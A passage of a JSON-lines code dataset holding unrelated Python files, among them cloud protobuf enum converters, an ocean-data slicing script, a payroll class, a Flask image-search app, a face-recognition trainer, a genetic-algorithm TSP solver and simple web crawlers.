instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.Value(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.Value(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return 
instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.Value(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerFailoverActionEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerFailoverActionEnum.Value(\n \"ComputeBetaInstanceGroupManagerFailoverActionEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerFailoverActionEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerFailoverActionEnum\") :\n ]\n\n\nclass Primitive(object):\n @classmethod\n def to_proto(self, s):\n if not s:\n return \"\"\n return s\n\n @classmethod\n def from_proto(self, s):\n return s\n","sub_path":"python/services/compute/beta/instance_group_manager.py","file_name":"instance_group_manager.py","file_ext":"py","file_size_in_byte":59008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"201631523","text":"from netCDF4 import Dataset\nimport numpy.ma as ma\n\n# import the netcdf file using Dataset\ndataset = Dataset(r'/Users/brownscholar/Desktop/Internships/ocean-ml/session-10-31/ssh_1572470095877.nc')\n\n# read in and create variable for lat:\nlat = dataset['latitude']\n\n# lon:\nlon = dataset['longitude']\n\n# adt:\nadt = dataset['adt']\n\n# print shape of the adt variable:\nprint(adt.shape)\n\n# you will need this:\nBATS_lat_max = 39.453\nBATS_lon_max = 360 -59.648999999999994 # converting from degrees west to degrees east\nBATS_lat_min = 19.663 \nBATS_lon_min = 360 -66.211 #same\n\nprint(lat[:])\n\nlat_index = set()\nindex = 0\n\nfor i in lat: \n\tif i >= BATS_lat_min and i <= BATS_lat_max:\n\t\tlat_index.add(index) # Must do .add in order to add for a set\n\tindex += 1\n\nprint(lat_index) \n\nlon_index = set()\nindex2 = 0\n\nfor i in lon: \n\tif i >= BATS_lon_min and i <= BATS_lon_max:\n\t\tlon_index.add(index2) # Must do .add in order to add for a set\n\tindex2 += 1 \n\nprint(lon_index) \n\nlat_index_min = min(lat_index)\nlat_index_max = max(lat_index)\n\nlon_index_min = min(lon_index)\nlon_index_max = max(lon_index)\n\nprint(\"Max of Lat:\", str(lat_index_max), \"\\nMin of Lat:\", str(lat_index_min), \"\\nMax of Lon:\", lon_index_max, \"\\nMin of Lon:\", lon_index_min)\n\nBATSadt = adt[:, lat_index_min:lat_index_max, 
lon_index_min:lon_index_max]\n\nprint(BATSadt.shape)\n\n\n","sub_path":"session-10-31/cutting_data.py","file_name":"cutting_data.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"420348804","text":"'''\n@Author: longfengpili\n@Date: 2020-03-09 09:45:10\n@LastEditTime: 2020-03-09 19:56:14\n@github: https://github.com/longfengpili\n'''\n#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n\n\nimport threading\nfrom queue import Queue\nimport time\n \nqueue = Queue()\n \n \ndef put_data_in_queue():\n for i in range(10):\n queue.put(i)\n \n \nclass MyThread(threading.Thread):\n def run(self):\n while not queue.empty():\n sleep_times = queue.get()\n print(sleep_times)\n time.sleep(sleep_times)\n queue.task_done()\n \n \ndef main_function():\n threads_num = 6\n while True:\n put_data_in_queue()\n for i in range(threads_num):\n myThread = MyThread()\n myThread.setDaemon(True)\n myThread.start()\n queue.join()\n time.sleep(3)\n\nmain_function()","sub_path":"syncio/asyncio_test.py","file_name":"asyncio_test.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"250709644","text":"# Lab Exercise 9\n# Calculate a person's payroll\n\nclass PayRoll:\n\t\"\"\"\n\tCalculate a person's paypall. Print out their name, how many normal hours\n\tthey work at what wage, and how much money earned for that. \n\tPrint over time if they worked more than 40hr a week.\n\tPrint out the total.\n\t\"\"\"\n\tdef __init__(self, name, wage, hours):\n\t\tself.name = name\n\t\tself.wage = wage\n\t\tself.hours = hours\n\t\t\n\n\t# Display person's regular pay\n\tdef calculate_pay(self):\n\t\tovertime = overtime_pay = reg_pay = total_pay = 0\n\t\n\t\tif self.hours <= 40:\n\t\t\treg_pay = self.hours * self.wage\n\t\telif self.hours > 40:\n\t\t\treg_pay = 40 * self.wage\n\t\t\tovertime = self.hours - 40\n\t\t\tovertime_pay = (self.wage * 1.5) * overtime\n\n\t\ttotal_pay = reg_pay + overtime_pay\n\n\n\t\tprint(\"You're {}.\" .format(self.name))\n\t\tprint(\"Your worked {} hours.\" .format(self.hours))\n\t\tprint(\"Your hourly wage is:{}\" .format(self.wage) + \" per hour.\")\n\t\tprint(\"Your regular pay is ${}.\" .format(reg_pay))\n\t\tprint(\"You OT pay ${}.\" .format(overtime_pay))\n\t\tprint(\"You total pay is ${}.\" .format(total_pay))\n\t\tprint(\"-----------------------------\")\n\nname = PayRoll('James', 10, 50)\nname2 = PayRoll('Amy', 15, 60)\n\nname.calculate_pay()\nname2.calculate_pay()\n\t\t\n\t\t","sub_path":"class_calculate_person_payroll.py","file_name":"class_calculate_person_payroll.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"353494286","text":"import Input\nimport Output\n\nclass Driver:\n # Class variable\n # List to store information of students\n students = []\n # List to store information of courses\n courses = []\n # List to store information of marks\n marks = []\n\n # Class variable\n nofstudents = None\n nofcourses = None\n\n def __init__(self):\n self.input = Input.Input(self)\n self.output = Output.Output(self)\n\n\n # Function to run the program\n def run_Driver(self):\n print(\"Please select operation: \\n\"\n \"1.Input number of students \\n\"\n \"2.Input number of courses \\n\"\n \"3.Input information for students \\n\"\n \"4.Input information for courses \\n\"\n \"5.Input mark for given courses \\n\"\n 
\"6.Calculate GPA for given student\\n\"\n \"7.Sort student by gpa\\n\"\n \"8.List students \\n\"\n \"9.List courses \\n\"\n \"10.List marks \\n\"\n \"11.Exit\")\n while True:\n select = int(input(\"Select operations form 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11:\"))\n if select == 1:\n self.input.input_number_students()\n elif select == 2:\n self.input.input_number_courses()\n elif select == 3:\n self.input.input_students_infor()\n elif select == 4:\n self.input.input_courses_infor()\n elif select == 5:\n self.input.input_mark()\n elif select == 6:\n self.output.calculate_GPA()\n elif select == 7:\n self.output.sort_student_list()\n elif select == 8:\n self.output.list_students()\n elif select == 9:\n self.output.list_courses()\n elif select == 10:\n self.output.list_mark()\n elif select == 11:\n print(\"Exited!!!\")\n break\n else:\n print(\"Invalid value\")\n","sub_path":"PW4/domains/Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"186946682","text":"\"\"\"\nTop level flask application\n\"\"\"\n\nimport flask\nimport os.path\n\nfrom smqtk.utils import DatabaseInfo\nfrom smqtk.utils.configuration import merge_configs\nfrom smqtk.utils.mongo_sessions import MongoSessionInterface\nfrom smqtk.web import SmqtkWebApp\n\nfrom .modules.login import LoginMod\nfrom .modules.iqr import IqrSearch\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass IqrSearchApp (SmqtkWebApp):\n\n @classmethod\n def is_usable(cls):\n return True\n\n @classmethod\n def get_default_config(cls):\n c = super(IqrSearchApp, cls).get_default_config()\n merge_configs(c, {\n \"mongo\": {\n \"server\": \"127.0.0.1:27017\",\n \"database\": \"smqtk\",\n },\n # Each entry in this mapping generates a new tab in the GUI\n \"iqr_tabs\": [\n IqrSearch.get_default_config(),\n ]\n })\n return c\n\n @classmethod\n def from_config(cls, config_dict):\n return cls(config_dict)\n\n def __init__(self, json_config):\n super(IqrSearchApp, self).__init__(json_config)\n\n #\n # Database setup using Mongo\n #\n h, p = self.json_config['mongo']['server'].split(':')\n n = self.json_config['mongo']['database']\n self.db_info = DatabaseInfo(h, p, n)\n\n # Use mongo for session storage.\n # -> This allows session modification during Flask methods called from\n # AJAX routines (default Flask sessions do not)\n self.session_interface = MongoSessionInterface(self.db_info.host,\n self.db_info.port,\n self.db_info.name)\n\n #\n # Misc. Setup\n #\n\n # Add 'do' statement usage\n self.jinja_env.add_extension('jinja2.ext.do')\n\n #\n # Modules\n #\n # Load up required and optional module blueprints\n #\n\n # Navigable blueprints. This should contain the blueprints that a user\n # should be able to navigate to. 
Not all blueprints have navigable\n # content or should allow user explicit navigation to, thus this\n # structure.\n #: :type: list of flask.Blueprint\n self._navigable_blueprints = []\n\n # Login module\n self.log.info(\"Initializing Login Blueprint\")\n\n self.module_login = LoginMod('login', self)\n self.register_blueprint(self.module_login)\n\n # IQR modules\n # - for each entry in 'iqr_tabs', initialize a separate IqrSearch\n # instance.\n self._iqr_search_modules = []\n for iqr_search_config in self.json_config['iqr_tabs']:\n self.log.info(\"Initializing IQR tab '%s'\",\n iqr_search_config['name'])\n self.log.debug(\"IQR tab config:\\n%s\", iqr_search_config)\n m = IqrSearch.from_config(iqr_search_config, self)\n self.register_blueprint(m)\n self.add_navigable_blueprint(m)\n self._iqr_search_modules.append(m)\n\n #\n # Basic routing\n #\n\n @self.route('/home')\n @self.route('/')\n def smqtk_index():\n self.log.info(\"Session: %s\", flask.session.items())\n # noinspection PyUnresolvedReferences\n return flask.render_template(\"index.html\", **self.nav_bar_content())\n\n def add_navigable_blueprint(self, bp):\n \"\"\"\n Register a navigable blueprint. This is not the same thing as\n registering a blueprint with flask, which should happen separately.\n\n :param bp: Blueprint to register as navigable via the navigation bar.\n :type bp: flask.Blueprint\n\n \"\"\"\n self._navigable_blueprints.append(bp)\n\n def nav_bar_content(self):\n \"\"\"\n Formatted dictionary for return during a flask.render_template() call.\n This content must be included in all flask.render_template calls that\n are rendering a template that descends from our ``base.html`` template\n in order to allow proper construction and rendering of navigation bar\n content.\n\n For example, when returning a flask.render_template() call:\n >> ret = {\"things\": \"and stuff\"}\n >> ret.update(smqtk_search_app.nav_bar_content())\n >> return flask.render_template(\"some_template.tmpl\", **ret)\n\n :return: Dictionary of content required for proper display of the\n navigation bar. Contains keys of module names and values of module\n URL prefixes.\n :rtype: {\"nav_content\": list of (tuple of str)}\n \"\"\"\n l = []\n for nbp in self._navigable_blueprints:\n l.append((nbp.name, nbp.url_prefix))\n return {\n \"nav_content\": l\n }\n\n\nAPPLICATION_CLASS = IqrSearchApp\n","sub_path":"python/smqtk/web/search_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"481459935","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport urllib.request\nimport bs4\n\nurl =\"http://www.goeas.kr/USR/ORG/MNU9/SchoolList.do?orgType=B\"\nhtml = urllib.request.urlopen(url)\nbs_obj = bs4.BeautifulSoup(html, 'html.parser')\n\nall_eleSc = bs_obj.find('table',{'class':'dtl'})\nall_td = all_eleSc.findAll('td')\n\nlist_td = []\n\n# 태그를 텍스트로 바꾸어서 리스트로 변환\nfor td in all_td:\n td_text = td.text.replace('\\n','').strip()\n list_td.append(td_text) #결과값을 리스트에 추가하기\n\nprint(\"구분 /\", \"학교명 /\", '주소 /', '교무실 /', '행정실 /', '팩스')\n# 리스트를 6개씩 분할하여 출력하기\nstart_pos = 0\nend_pos = len(list_td)\ndiv = 6\n\nfor i in range(start_pos,end_pos+div,div): #i는 왜 사용된지 잘 이해가 안됨.\n out = list_td[start_pos:start_pos+div]\n if out != []:\n print(' / '.join(out)) #리스트를 문자열로 변환\n start_pos = start_pos + div\n\ninput()\n\n\n# 한줄씩 나오는 리스트를 붙이려면? 
분할자를 이용\n# 리스트를 이어 붙이는 방법은?\n","sub_path":"크롤링_안산교육지원청_2018/py_script_안산관내 초등학교 연락처_200309.py","file_name":"py_script_안산관내 초등학교 연락처_200309.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"484940468","text":"import os\nimport logging\nimport time\nimport imagehash\nimport cv2\nfrom PIL import Image\n\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.svm import SVC\nfrom sklearn.externals import joblib\n\nimport faceapi\nimport numpy as np\nfrom faceapi.utils import log_center\n\nimport faceInfo\n\nfileDir = os.path.dirname(os.path.realpath(__file__))\nsvm_dir = os.path.join(fileDir, 'svm')\n_DEFAULT_SVM_FILE_NAME = 'svm.pkl'\n\n\nclass Trainer:\n def __init__(self, train_db):\n self._log = log_center.make_logger(__name__, logging.DEBUG)\n\n self._save_result = False\n self._face_db = train_db\n self._face_eigener = faceapi.eigener.make_eigener()\n\n self._training_id = -1\n self._training_name = ''\n\n self._svm_file = os.path.join(svm_dir, _DEFAULT_SVM_FILE_NAME)\n if not os.path.exists(svm_dir):\n os.makedirs(svm_dir)\n\n def loadSVM(self):\n if os.path.isfile(self._svm_file):\n self._svm = joblib.load(self._svm_file)\n return self._svm\n\n def faceList(self):\n list = []\n for info in self._face_db.dbList():\n face_info = faceInfo.FaceInfo(\n info['id'],\n info['name'],\n [float(x) for x in info['eigen'].split(',')],\n info['src_hash'].encode('ascii', 'ignore'),\n info['face_img'].encode('ascii', 'ignore'),\n info['class_id'])\n list.append(face_info)\n return list\n\n\n def trainFace(self, name, cv_img, imgPath, face):\n self._training_id = self._toIdentity(name)\n self._training_name = name\n self._log.info('Training new image')\n if self._training_id is None:\n people_list = self._face_db.distinct_search(['name', 'class_id'], 'class_id')\n self._training_id = len(people_list)\n\n if cv_img is not None:\n img = Image.fromarray(cv2.flip(cv_img, 1))\n pil_img = self._toPilImg(img)\n src_hash = str(imagehash.phash(pil_img, hash_size=16))\n\n db_list = self._face_db.search(\n 'src_hash',\n '{}'.format(src_hash),\n 1)\n\n if len(db_list) > 0:\n self._log.debug('trained image, skip it')\n return False\n\n t = time.time()\n phash, rep = self._face_eigener.eigenValue(face.img)\n\n record = faceInfo.FaceInfo(\n 0,\n self._training_name,\n rep,\n src_hash,\n imgPath,\n self._training_id)\n t = time.time() - t\n self._log.debug(\"training img done({})\".format(t))\n\n self._face_db.addFace(record)\n\n self._training_id = -1\n self._training_name = ''\n\n\n\n def trainSVM(self):\n self._db_dict = {}\n for info in self._face_db.dbList():\n h = info['id']\n info.pop(\"id\", None)\n self._db_dict[h] = info\n\n # train svm\n param_grid = [\n {'C': [1, 10, 100, 1000],\n 'kernel': ['linear']},\n {'C': [1, 10, 100, 1000],\n 'gamma': [0.001, 0.0001],\n 'kernel': ['rbf']}]\n\n d = self._trainData()\n if d is None:\n self._svm = None\n return\n\n self._log.info('Training svm')\n t = time.time()\n (X, y) = d\n self._svm = GridSearchCV(\n SVC(C=1, probability=True),\n param_grid, cv=5).fit(X, y)\n self._log.info(\"train svm: {}\".format(self._svm))\n\n joblib.dump(self._svm, self._svm_file)\n # print 'save svm: {}'.format(ret)\n self._log.info('Training svm done({})'.format(time.time() - t))\n\n def _toIdentity(self, name):\n db_name_map = self._face_db.distinct_search(\n ['name', 'class_id'], 'class_id')\n\n if len(db_name_map) == 0:\n return None\n\n check_ret = [\n (name_dic['name'], 
name_dic['class_id'])\n for name_dic in db_name_map\n if name_dic['name'] == name]\n\n if len(check_ret) == 0:\n return None\n\n class_id = (check_ret[0])[1]\n\n return class_id\n\n def _toPilImg(self, image):\n if isinstance(image, basestring):\n img = Image.open(image).convert('RGB')\n elif isinstance(image, Image.Image):\n img = image.convert('RGB')\n else:\n img = None\n return img\n\n def _trainData(self):\n X = []\n y = []\n\n # db_list = self._db_dict.values()\n # db_list.sort(key=lambda info: info['class_id'])\n for info in self._db_dict.values():\n rep_list = [float(x) for x in info['eigen'].split(',')]\n X.append(rep_list)\n y.append(info['class_id'])\n\n db_names = self._face_db.distinct_search(\n ['name', 'class_id'], 'class_id')\n if len(db_names) == 1:\n self._log.info(\"just one class, do not train svm.\")\n return None\n\n cnt = len(set(y + [-1])) - 1\n if cnt == 0:\n return None\n\n X = np.vstack(X)\n y = np.array(y)\n\n self._log.info(\"classes({}): {}\".format(len(y), y))\n # print 'X({}):\\n{}'.format(len(X), X)\n return (X, y)","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"296034925","text":"from flask import render_template\n\n\nclass SummaryAnalysisController:\n\n def __init__(self, parameterService, tickerRateService, ticketAnalysisService , bullishVsBearishAnalysisService ,linearRegressionSerice, priceChangeAnalysisService, template):\n self.time_frame = 1500\n self.parameterService = parameterService\n self.tickerRateService = tickerRateService\n self.ticketAnalysisService = ticketAnalysisService\n self.bullishVsBearishAnalysisService = bullishVsBearishAnalysisService\n self.linearRegressionSerice = linearRegressionSerice\n self.priceChangeAnalysisService = priceChangeAnalysisService\n self.template = template\n\n def dispatch(self, request):\n tickers, from_date, till_date = self.parameterService.init_params(self.time_frame)\n bullish_vs_bearish_totals = None\n slope_and_rsquare_totals = None\n price_changes = None\n\n if request.method == 'POST':\n tickers, from_date, till_date = self.parameterService.process_params(request)\n tickers = tickers[0]\n if not (tickers is None or from_date is None or till_date is None):\n ticker_data = self.tickerRateService.get_rate(tickers, from_date, till_date)\n if ticker_data is not None:\n ticker_data = self.ticketAnalysisService.analyze_dataframe(ticker_data)\n price_changes = self.priceChangeAnalysisService.calculate_price_change(ticker_data)\n\n bullish_vs_bearish_totals = self.bullishVsBearishAnalysisService.analyze_dataframe(ticker_data)\n\n slope_and_rsquare_totals = self.linearRegressionSerice.calculate_slope_and_rsquare(ticker_data)\n\n return render_template(self.template, tickers = tickers, from_date=from_date, till_date= till_date,\n bullish_vs_bearish_totals=bullish_vs_bearish_totals,\n slope_and_rsquare_totals=slope_and_rsquare_totals,\n price_changes=price_changes)\n","sub_path":"rjgoptionssite/oldflasky/flasky-16NOV/controllers/summary_analysis_controller.py","file_name":"summary_analysis_controller.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"68941584","text":"import sys\nimport time\nimport math\nimport random\n#transition 任兩個互換\n#evalutation 連線距離和 \n#determination 距離短者獲勝\n#note:\n#random.randint(a,b) --> a <= x <= b\n#range(a,b) --> a <= x < b\n#senario: 
fitness(), select(), crossover(), mutation()\n#Data structure: chromo_data = {'chromo':[],'distance':[]}\n\ndef ran(domain):\n    first = 0\n    second = 0\n    while first == second:\n        first = random.randint(0,domain-1)\n        second = random.randint(0,domain-1)\n\n    return [first,second]\n\ndef init(num,chromo_num):\n    chromo_data = {'chromo':[],'distance':[]}\n\n    for i in range(chromo_num):\n        seq = []\n        list_1_to_num = list(range(1,num+1))\n        while len(list_1_to_num) > 0:\n            index = random.randint(0,len(list_1_to_num)-1)\n            seq.append(list_1_to_num.pop(index))\n        chromo_data['chromo'].append(seq)\n    return chromo_data\n\ndef trans(seq):\n    temp = seq[:]\n    index = ran(len(seq))\n    t = temp[index[0]]\n    temp[index[0]] = temp[index[1]]\n    temp[index[1]] = t\n    return temp\n\ndef distance(axis):\n    return round(math.sqrt(axis[0]*axis[0]+axis[1]*axis[1]))\n\ndef evalu(seq,dic):\n    dist = 0\n    for i in range(len(seq)):\n        delta_x = dic[seq[i]][0]-dic[seq[(i+1)%len(seq)]][0]\n        delta_y = dic[seq[i]][1]-dic[seq[(i+1)%len(seq)]][1]\n\n        dist += distance([delta_x,delta_y])\n\n    return dist\n\ndef determin(temp,seq,dic):\n    if evalu(temp,dic) < evalu(seq,dic):\n        seq = temp[:]\n    return seq\n\ndef readfile(dic):\n    with open('eil51.txt') as f:\n        r = f.read()\n    read_line = r.split('\\n')\n    for i in range(len(read_line)):\n        read_element = read_line[i].split()\n        dic[int(read_element[0])] = [int(read_element[1])]\n        dic[int(read_element[0])].append(int(read_element[2]))\n    f.close()\n\ndef fitness(chromo_data,dic):\n    #clear chromosome distance\n    new_data = {'chromo':[],'distance':[]}\n    new_data['chromo'] = chromo_data['chromo'][:]\n\n    #calculate distance of each chromosome\n    for i in range(len(chromo_data['chromo'])):\n        new_data['distance'].append(evalu(chromo_data['chromo'][i],dic))\n    return new_data\ndef select(chromo_data,player):\n    new_data = {'chromo':[],'distance':[]}\n    while len(new_data['chromo']) < len(chromo_data['chromo']):\n        tmp = []\n        check = []\n        ran_list = []\n        while len(tmp) < player:\n            ran = random.randint(0,len(chromo_data['chromo'])-1)\n            if ran not in ran_list:\n                check = chromo_data['chromo'][ran]\n                tmp.append(check)\n                ran_list.append(ran)  #remember drawn indices so tournament candidates are distinct\n\n        best = tmp[0]\n        for i in tmp:\n            if evalu(i,dic) < evalu(best,dic):\n                best = i\n        new_data['chromo'].append(best)\n\n    return new_data\n\ndef crossover(chromo_data,c_rate):\n    new_chromo = {'chromo':[],'distance':[]}\n    while 1:\n        test1 = chromo_data['chromo'].pop(random.randint(0,len(chromo_data['chromo'])-1))\n        test2 = chromo_data['chromo'].pop(random.randint(0,len(chromo_data['chromo'])-1))\n        if random.random() > c_rate:\n            new_chromo['chromo'].append(test1)\n            new_chromo['chromo'].append(test2)\n        else:\n            #print('chosen list:',test1,test2)\n            index1 = random.randint(0,len(test1)-1)\n            index2 = random.randint(0,len(test2)-1)\n            index1, index2 = min(index1,index2), max(index1,index2)  #order the cut points in one step before slicing\n            new2 = test1[index1:index2+1]\n            new1 = test2[index1:index2+1]\n            tmp1 = [x for x in test1 if x not in new2]\n            tmp2 = [x for x in test2 if x not in new1]\n            #print('break:',index1,index2)\n            #find order of chromo\n            for i in range(len(tmp1)):\n                alter = tmp1[i]\n                while 1:\n                    if alter in new1:\n                        alter = new2[new1.index(alter)]\n                    else:\n                        tmp1[i] = alter\n                        break\n            for i in range(len(tmp2)):\n                alter = tmp2[i]\n                while 1:\n                    if alter in new2:\n                        alter = new1[new2.index(alter)]\n                    else:\n                        tmp2[i] = alter\n                        break\n\n            #paste back lookup to test\n            new1 = tmp1[0:index1]+new1+tmp1[index1:]\n            new2 = tmp2[0:index1]+new2+tmp2[index1:]\n            new_chromo['chromo'].append(new1)\n            new_chromo['chromo'].append(new2)\n        if 
len(chromo_data['chromo']) < 2:\n if len(chromo_data['chromo']) == 1:\n new_chromo['chromo'].append(chromo_data['chromo'].pop()) \n break\n return new_chromo\n\ndef mutation(chromo_data,m_rate):\n new_data = {'chromo':[],'distance':[]}\n new_data['chromo'] = chromo_data['chromo'][:]\n \n \n if random.random() < m_rate:\n index = random.randint(0,len(new_data['chromo'])-1)\n tmp = trans(new_data['chromo'].pop(index))\n new_data['chromo'].append(tmp)\n \n return new_data\ndef get_average(list):\n sum = 0\n for item in list:\n sum += item\n return sum/len(list)\ndef get_stddev(list):\n average = get_average(list)\n sdsq = sum([(i - average) ** 2 for i in list])\n stdev = (sdsq / (len(list) - 1)) ** .5\n return stdev \n\n#initial \n\n\n #dic={a:b}, a是點的編號(type[int]),b是點的座標(type[list]) (Ex:dic={1:[0,1]})\ndic = {}\nreadfile(dic)\nchromo_num = 100\niter_num = input('Please enter the iteration:')\niter_num = int(iter_num)\nplayer = 25\n\n\nt1 = time.time()\n#Execute\n\nchromo_data = init(len(dic),chromo_num)\nchromo_data = fitness(chromo_data,dic)\nfor i in range(1,iter_num+1): \n #print('iter',i)\n chromo_data = select(chromo_data,player)\n chromo_data = fitness(chromo_data,dic)\n #print('after select:',chromo_data['distance'])\n chromo_data = crossover(chromo_data,0.9)\n chromo_data = fitness(chromo_data,dic)\n #print('after crosso:',chromo_data['distance'])\n chromo_data = mutation(chromo_data,0.9)\n chromo_data = fitness(chromo_data,dic)\n #print('after mutati:',chromo_data['distance'])\n #print(get_stddev(chromo_data['distance']))\n #print(chromo_data['distance'])\n #result[i] += evalu(seq,dic)\n #print(' ')\n \n \n \nt2 = time.time() \nprint('Time: %.2f (second)(不包含I/O時間)'% (t2-t1))\nprint(chromo_data['distance']) \n\n\n#Calculating average and output\n\n\n\n\n\n","sub_path":"ga_tsp_problem/ga_tour_pmx_tsp.py","file_name":"ga_tour_pmx_tsp.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"100692861","text":"# COURSERA\n\ndef busca_binaria(lista,x):\n primeiro = 0\n ultimo = len(lista)-1\n\n while primeiro <= ultimo:\n meio = (primeiro+ultimo)//2\n if lista[meio] == x:\n return meio\n else:\n if x < lista[meio]:\n ultimo = meio-1\n else:\n if x > lista[meio]:\n primeiro = meio+1\n return \"elemento nao encontrado\"\n\ndef add_lista(lista,valores):\n lista.append(valores)\n return lista\n\nlista = []\ntamanho = int(input(\"Digite o tamanho da lista: \"))\n\nwhile len(lista) < tamanho: # add os valores de acordo com o tamanho especificado\n valores = int(input(\"digite os valores a serem add na lista: \"))\n add_lista(lista,valores)\n\nprint(lista)\n\nx = int(input(\"Dgt o valor para buscar na lista: \"))\n\nprint(busca_binaria(lista,x))\n\n","sub_path":"Aulas/Algoritmo de Busca/Busca_binaria.py","file_name":"Busca_binaria.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"325031741","text":"from concurrent.futures import ThreadPoolExecutor\n\nfrom requests import Session\nfrom tqdm import tqdm\n\nfrom .cache import Cache\n\nREQUEST_HEADERS = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\",\n \"Cache-Control\": \"no-cache\",\n \"Connection\": \"keep-alive\",\n \"DNT\": \"1\",\n \"Pragma\": \"no-cache\",\n \"Upgrade-Insecure-Requests\": 
\"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\"\n}\n\n\nclass BaseCrawler:\n def __init__(self):\n self.debug = False\n\n self.session = Session()\n self.cache = None\n\n def collect(self):\n raise NotImplementedError\n\n def make_get_req(self, url, **kwargs):\n if self.debug:\n if not self.cache:\n self.cache = Cache()\n\n response = self.cache.get(url)\n\n if response:\n return response\n\n response = self.make_get(url, **kwargs)\n\n if response.status_code == 200:\n self.cache.put(url, response)\n\n return response\n\n return self.make_get(url, **kwargs)\n\n def make_get(self, url, **kwargs):\n default_kwargs = dict(\n headers=REQUEST_HEADERS,\n timeout=60,\n allow_redirects=True\n )\n\n return self.session.request(\n method='GET',\n url=url,\n **{**default_kwargs, **kwargs}\n )\n\n def make_get_async(self, url_list, name=None, **kwargs):\n output = []\n\n with ThreadPoolExecutor(max_workers=8) as executor:\n future_to_obj = {executor.submit(self.make_get_req, url, **kwargs): url for url in url_list}\n\n iterator = tqdm(future_to_obj, desc=name) if self.debug is True else future_to_obj\n\n for future in iterator:\n try:\n response = future.result()\n except:\n break\n\n output.append(response)\n\n return 